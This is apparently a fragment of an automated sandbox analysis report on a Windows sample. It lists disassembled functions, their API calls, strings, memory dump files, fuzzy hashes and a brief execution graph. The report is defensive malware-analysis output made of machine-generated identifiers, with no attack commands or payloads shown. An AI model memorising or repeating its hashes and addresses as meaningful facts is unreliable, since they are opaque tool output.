                                                          • Instruction Fuzzy Hash: C3015676D0424AAFDB118F55EE45F6A7BA8FB047A4B00043DF54697121C6329851F7A0
                                                          Function 00FD9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                          • Instruction ID: 6ce28ec284915439c582ff2edcce53c7dfe0e3785f49097b4e1b050b9456eced
                                                          • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                          • Instruction Fuzzy Hash: 09A12772E182869FE721CF98C8917AEBBE6EF51320F1C416FD5859B381C2B88941E750
                                                          Function 00FBA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00FB7F69,?,?,?), ref: 00FBA3FA
                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00FB7F69,?), ref: 00FBA43E
                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00FB7F69,?,?,?,?,?,?,?), ref: 00FBA4BF
                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00FB7F69,?,?,?,?,?,?,?,?,?,?), ref: 00FBA4C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$Create$CloseHandleTime
                                                          • String ID:
                                                          • API String ID: 2287278272-0
                                                          • Opcode ID: a060de686dfbfd446cb466808b61c61fddcc60bad10a868971801be3ec3e5253
                                                          • Instruction ID: 8ee58380d736f1718cfda9a5b6f3af1676f9111f4c899c809695d1a226340f17
                                                          • Opcode Fuzzy Hash: a060de686dfbfd446cb466808b61c61fddcc60bad10a868971801be3ec3e5253
                                                          • Instruction Fuzzy Hash: 1741F131648381AAE731DF25DC4AFEEBBE4AB81314F08091DB5D193191C6A99A4CEF53
                                                          Function 00FB1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID:
                                                          • API String ID: 176396367-0
                                                          • Opcode ID: b33159f27a34d57082112ee8080aa8efa64bb3d1dae47e168b7629db6d881e90
                                                          • Instruction ID: b73736a7864279a86522729f6a5076d0370bcd04e4a03e165310203417943afe
                                                          • Opcode Fuzzy Hash: b33159f27a34d57082112ee8080aa8efa64bb3d1dae47e168b7629db6d881e90
                                                          • Instruction Fuzzy Hash: CD41D9719006569BCB219F688C1A9DE7BB8EF00320F040019FE45F7245DF34AE599BA5
                                                          Function 00FDC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00FD91E0,?,00000000,?,00000001,?,?,00000001,00FD91E0,?), ref: 00FDC9D5
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FDCA5E
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00FD6CBE,?), ref: 00FDCA70
                                                          • __freea.LIBCMT ref: 00FDCA79
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: 9929fa62a3c231aa3be40bd1dedb11055cb1994884467fe0e6a3e38ade068d84
                                                          • Instruction ID: 70b9808617fec8f0f2468c6656c1a0aee950ade1f9ac0b3815ce7a45fd315072
                                                          • Opcode Fuzzy Hash: 9929fa62a3c231aa3be40bd1dedb11055cb1994884467fe0e6a3e38ade068d84
                                                          • Instruction Fuzzy Hash: E131B57290021AABDF24DF65DC55DBE7BA6EB41320B18426AFC04DB290E739DD50EBD0
                                                          Function 00FCA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00FCA666
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FCA675
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FCA683
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00FCA691
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 6a1d24509aad134c46a0d4ee8a2eaf2ecbacce874a43a4c2b43b3d3c49fdb820
                                                          • Instruction ID: 3a2ded3fdceb5eaf9c99831c92308ee2219cf7f461de56b98399821d7df0def4
                                                          • Opcode Fuzzy Hash: 6a1d24509aad134c46a0d4ee8a2eaf2ecbacce874a43a4c2b43b3d3c49fdb820
                                                          • Instruction Fuzzy Hash: 73E0EC31942722A7D6725B60BC1EB9A3E98BF05BA2F010101FB45AA184DB6D85019BA1
                                                          Function 00FCA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FCA699: GetDC.USER32(00000000), ref: 00FCA69D
                                                            • Part of subcall function 00FCA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FCA6A8
                                                            • Part of subcall function 00FCA699: ReleaseDC.USER32(00000000,00000000), ref: 00FCA6B3
                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00FCA83C
                                                            • Part of subcall function 00FCAAC9: GetDC.USER32(00000000), ref: 00FCAAD2
                                                            • Part of subcall function 00FCAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00FCAB01
                                                            • Part of subcall function 00FCAAC9: ReleaseDC.USER32(00000000,?), ref: 00FCAB99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ObjectRelease$CapsDevice
                                                          • String ID: (
                                                          • API String ID: 1061551593-3887548279
                                                          • Opcode ID: a58b0cebd0472eda3e22ea1d5aabac12687c6c8dc0371b99126d82567a0174d7
                                                          • Instruction ID: 5491202dec4b93fa291984457435f5d68ffe0d156f990057dd7b806a978f1063
                                                          • Opcode Fuzzy Hash: a58b0cebd0472eda3e22ea1d5aabac12687c6c8dc0371b99126d82567a0174d7
                                                          • Instruction Fuzzy Hash: 2F911271604349AFD620DF25C889E2BBBE8FFC9714F00491EF59AD7260CB35A905DB62
                                                          Function 00FB75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB75E3
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                            • Part of subcall function 00FBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FBA598
                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB777F
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA501
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA532
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                          • String ID: :
                                                          • API String ID: 3226429890-336475711
                                                          • Opcode ID: f54eb0cf0ed14bd54c700be955c281c561ce8b4674edfcfc633370b77080596d
                                                          • Instruction ID: c25dd41cd64203b83ef277ef46c272e5ded100be90334f4ec64b80a16fa959b7
                                                          • Opcode Fuzzy Hash: f54eb0cf0ed14bd54c700be955c281c561ce8b4674edfcfc633370b77080596d
                                                          • Instruction Fuzzy Hash: 7F418471804258A9EB35FB66CD5AEEEB37DEF81300F004096B605A3092DB785F85EF61
                                                          Function 00FCB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: }
                                                          • API String ID: 176396367-4239843852
                                                          • Opcode ID: 4e66774427ae02f737441026304d82e235d27df47ea161c84309f7e67ded5ae7
                                                          • Instruction ID: a35a05c1c0cd06e93972085e8c3e1b9e61393826b92332e3d559aac0f0ddbd6c
                                                          • Opcode Fuzzy Hash: 4e66774427ae02f737441026304d82e235d27df47ea161c84309f7e67ded5ae7
                                                          • Instruction Fuzzy Hash: 2021D476D043075AD731EA64DE47F6AB3DCDF90760F08082EF640C3246EB68D948A3A2
                                                          Function 00FBF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FBF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FBF2E4
                                                            • Part of subcall function 00FBF2C5: GetProcAddress.KERNEL32(00FF81C8,CryptUnprotectMemory), ref: 00FBF2F4
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00FBF33E), ref: 00FBF3D2
                                                          Strings
                                                          • CryptProtectMemory failed, xrefs: 00FBF389
                                                          • CryptUnprotectMemory failed, xrefs: 00FBF3CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CurrentProcess
                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                          • API String ID: 2190909847-396321323
                                                          • Opcode ID: ab492d2860d66adb245a1bd8a61a2e63de8e6101cc17b62f2c0e20717c2761ce
                                                          • Instruction ID: dbb920723de96fe397a8d6a1daf0530f51154bd03dc7ffe4ea0ceaadc62bef2c
                                                          • Opcode Fuzzy Hash: ab492d2860d66adb245a1bd8a61a2e63de8e6101cc17b62f2c0e20717c2761ce
                                                          • Instruction Fuzzy Hash: 50112932A01269ABDF115F22DC49AFE3B98FF00770B084125FC415B251DA389D46BF91
                                                          Function 00FBB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FBB9B8
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: __vswprintf_c_l_swprintf
                                                          • String ID: %c:\
                                                          • API String ID: 1543624204-3142399695
                                                          • Opcode ID: c17c44b3523433037e8d0e6a08137e2ace467b1487dcf783cb46fd3c1fcd92f2
                                                          • Instruction ID: d0d8aff1e75e3007508674f3f243f70a00f6293a5bfdd9615e23d2676d527cec
                                                          • Opcode Fuzzy Hash: c17c44b3523433037e8d0e6a08137e2ace467b1487dcf783cb46fd3c1fcd92f2
                                                          • Instruction Fuzzy Hash: 6E01F963900311659630AB3B8C85DABB7ACDE92770B44441BF544D7182EB78D444E6F1
                                                          Function 00FC101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00010000,00FC1160,?,00000000,00000000), ref: 00FC1043
                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00FC108A
                                                            • Part of subcall function 00FB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB6C54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                          • String ID: CreateThread failed
                                                          • API String ID: 2655393344-3849766595
                                                          • Opcode ID: 2f7674b7009fb6e26c7746db01a63ebbfb8632c6d1dc1a477f8740c5d5048166
                                                          • Instruction ID: 8c3fdfac0ece6b417a7a96228024570ac5d6d851f33878ecc943e408411d2ab3
                                                          • Opcode Fuzzy Hash: 2f7674b7009fb6e26c7746db01a63ebbfb8632c6d1dc1a477f8740c5d5048166
                                                          • Instruction Fuzzy Hash: 24014EB534034E6FD3305F259D46F767358FF41361F10002DF74296281CEA1A885B621
                                                          Function 00FB1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FBE2E8: _swprintf.LIBCMT ref: 00FBE30E
                                                            • Part of subcall function 00FBE2E8: _strlen.LIBCMT ref: 00FBE32F
                                                            • Part of subcall function 00FBE2E8: SetDlgItemTextW.USER32(?,00FEE274,?), ref: 00FBE38F
                                                            • Part of subcall function 00FBE2E8: GetWindowRect.USER32(?,?), ref: 00FBE3C9
                                                            • Part of subcall function 00FBE2E8: GetClientRect.USER32(?,?), ref: 00FBE3D5
                                                          • GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                          • SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                          • String ID: 0
                                                          • API String ID: 2622349952-4108050209
                                                          • Opcode ID: d5a6da28967987688850caa0788306a8e04f85d066d6828358caaec32ad976b5
                                                          • Instruction ID: 723d549b1b023eb2865cc1fb4d2310636608a958a81dcf04170bd76597de99b1
                                                          • Opcode Fuzzy Hash: d5a6da28967987688850caa0788306a8e04f85d066d6828358caaec32ad976b5
                                                          • Instruction Fuzzy Hash: 68F08C3094428CAADF250F62881DBEA3BA8BF42364F488114FD8465991EB7AC990BF10
                                                          Function 00FC0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00FC1206,?), ref: 00FC0FEA
                                                          • GetLastError.KERNEL32(?), ref: 00FC0FF6
                                                            • Part of subcall function 00FB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB6C54
                                                          Strings
                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FC0FFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                          • API String ID: 1091760877-2248577382
                                                          • Opcode ID: 0815a1391fa3dbab4bcb2071a8b67ebafd6b39b2f922bfabf54d6c48a53db288
                                                          • Instruction ID: 0782469e1f1f3a22cefc8f774736199e87092c6e47e85cbeccd0b147375c42e5
                                                          • Opcode Fuzzy Hash: 0815a1391fa3dbab4bcb2071a8b67ebafd6b39b2f922bfabf54d6c48a53db288
                                                          • Instruction Fuzzy Hash: 19D02B719041647AC61033265C0EDBE3C059F12332B600718F238A52F6CE2849817A92
                                                          Function 00FBE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00FBDA55,?), ref: 00FBE2A3
                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FBDA55,?), ref: 00FBE2B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FindHandleModuleResource
                                                          • String ID: RTL
                                                          • API String ID: 3537982541-834975271
                                                          • Opcode ID: 5b2c0e1c88c9c273025ec73c9dc8b4111ee94cf6d27198a2aef3c44d2ab17c5c
                                                          • Instruction ID: 4b6dee7926a750ec2aa861ae8a7d3a338d03698a5bbe0bfc888d24db43fb499f
                                                          • Opcode Fuzzy Hash: 5b2c0e1c88c9c273025ec73c9dc8b4111ee94cf6d27198a2aef3c44d2ab17c5c
                                                          • Instruction Fuzzy Hash: ACC01231A4079066EA3067766C8DB837A585B00B29F09045DB281EF2D1DAA9C980AAA0

                                                          Execution Graph

                                                          Execution Coverage:7%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 8289 7ffd9bbdbab1 8292 7ffd9bbdbb26 QueryFullProcessImageNameA 8289->8292 8291 7ffd9bbdbc74 8292->8291

                                                          Executed Functions

